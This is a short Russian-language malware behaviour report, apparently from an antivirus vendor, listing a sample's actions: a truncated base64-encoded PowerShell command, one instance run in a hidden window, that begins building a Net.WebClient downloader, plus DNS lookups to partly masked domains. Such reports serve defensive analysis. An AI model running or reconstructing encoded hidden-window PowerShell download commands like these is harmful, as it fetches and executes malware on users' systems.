Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqAF8AXwAxADMANgA0ADIAPQAoACcAcgBfADEAJwArACcAMQA3ACcAKwAnADUAXwAnACkAOwAkAGIAXwAxADkAMQA3ADgAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAagAxAF8AMAAwADYANwA9AC...
- DNS ASK cp###ech.com
- DNS ASK pa###nstore.com
- DNS ASK ha#####shcompany.com
- DNS ASK mi####tfoods.com
- DNS ASK ng####dachung.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqAF8AXwAxADMANgA0ADIAPQAoACcAcgBfADEAJwArACcAMQA3ACcAKwAnADUAXwAnACkAOwAkAGIAXwAxADkAMQA3ADgAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAagAxAF8AMAAwADYANwA9AC...' (со скрытым окном)